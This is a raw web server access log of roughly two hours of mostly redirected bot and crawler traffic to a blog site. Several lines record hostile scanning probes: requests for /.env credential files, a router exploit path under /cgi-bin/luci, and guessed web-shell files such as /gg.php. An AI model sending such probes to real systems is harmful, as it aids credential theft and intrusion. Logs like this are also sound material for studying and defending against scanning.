104.196.169.131 - - [12/Feb/2026:14:21:03 -0500] "HEAD /wp/ HTTP/1.1" 302 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0"
104.196.169.131 - - [12/Feb/2026:14:21:04 -0500] "HEAD /new/ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15"
204.76.203.206 - - [12/Feb/2026:14:22:45 -0500] "GET / HTTP/1.1" 302 390 "-" "Wget"
204.76.203.212 - - [12/Feb/2026:14:34:56 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
91.224.92.115 - - [12/Feb/2026:14:36:35 -0500] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 302 270 "-" "-"
146.19.24.133 - - [12/Feb/2026:14:43:21 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:144.0) Gecko/20100101 Firefox/144.0"
141.94.194.132 - - [12/Feb/2026:14:48:12 -0500] "GET /2007/06/28/sharing-paris-4/feed/ HTTP/1.1" 302 274 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.66 Safari/537.36"
204.76.203.206 - - [12/Feb/2026:14:55:09 -0500] "GET / HTTP/1.1" 302 390 "-" "Wget"
204.76.203.212 - - [12/Feb/2026:14:58:35 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.247.137.218 - - [12/Feb/2026:15:00:10 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
45.194.92.25 - - [12/Feb/2026:15:04:04 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.212 - - [12/Feb/2026:15:23:49 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
77.83.39.207 - - [12/Feb/2026:15:24:48 -0500] "GET /.env HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko)"
145.239.10.137 - - [12/Feb/2026:15:26:30 -0500] "GET /gg.php HTTP/1.1" 302 270 "http://poshbitch.com/gg.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1"
145.239.10.137 - - [12/Feb/2026:15:26:30 -0500] "GET /gt.php HTTP/1.1" 302 270 "http://poshbitch.com/gt.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1"
154.8.193.64 - - [12/Feb/2026:15:34:31 -0500] "GET / HTTP/1.1" 302 390 "-" "Go-http-client/1.1"
34.158.168.101 - - [12/Feb/2026:15:46:55 -0500] "GET /.env HTTP/1.1" 302 270 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/120.0.0.0"
87.120.191.67 - - [12/Feb/2026:15:49:05 -0500] "POST / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
204.76.203.206 - - [12/Feb/2026:15:50:11 -0500] "GET / HTTP/1.1" 302 390 "-" "Wget"
204.76.203.212 - - [12/Feb/2026:15:51:39 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
176.65.132.94 - - [12/Feb/2026:15:54:27 -0500] "POST / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
92.118.39.74 - - [12/Feb/2026:16:01:09 -0500] "GET /.env HTTP/1.1" 302 270 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/11.0"
116.204.151.190 - - [12/Feb/2026:16:06:25 -0500] "GET /2007/06/17/we-live-together-2 HTTP/1.1" 302 274 "http://www.poshbitch.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Safari/605.1.15"
204.76.203.212 - - [12/Feb/2026:16:16:07 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
176.65.139.8 - - [12/Feb/2026:16:28:56 -0500] "GET / HTTP/1.1" 302 390 "-" "-"
